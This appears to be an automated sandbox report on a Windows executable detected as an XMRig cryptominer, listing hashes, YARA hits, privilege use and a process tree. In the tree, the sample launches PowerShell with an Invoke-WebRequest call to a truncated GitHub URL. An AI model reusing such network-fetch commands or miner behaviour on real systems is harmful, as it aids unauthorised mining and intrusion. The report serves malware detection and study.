Analysis
-
max time kernel
110s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 12:11
Behavioral task
behavioral1
Sample
0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
Resource
win7-20241010-en
8 signatures
120 seconds
General
-
Target
0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
-
Size
1.6MB
-
MD5
6e8973edb75ebc2a257a752f858661a7
-
SHA1
4aa5fb5f5211bb1d0598154bc5d447c526f8a435
-
SHA256
0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78
-
SHA512
1ee2e74fc76dda6f2bba679069e781466ed62a0a58d4432580997bf678e39e7f1597c718fa0c00bce156fefef55e9c909220414cdf879653cf3dd73552a76e96
-
SSDEEP
49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pXHqJ:NABm
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1048-13-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-14-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-15-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-17-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-18-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-19-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-20-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-21-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-22-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-23-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig behavioral1/memory/1048-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp xmrig -
pid Process 928 powershell.exe -
resource yara_rule behavioral1/memory/1048-0-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-13-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-14-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-15-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-17-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-18-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-19-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-20-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-21-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-22-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-23-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx behavioral1/memory/1048-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeLockMemoryPrivilege 1048 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe Token: SeLockMemoryPrivilege 1048 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe Token: SeDebugPrivilege 928 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1048 wrote to memory of 928 1048 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe 30 PID 1048 wrote to memory of 928 1048 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe 30 PID 1048 wrote to memory of 928 1048 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe"C:\Users\Admin\AppData\Local\Temp\0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928
-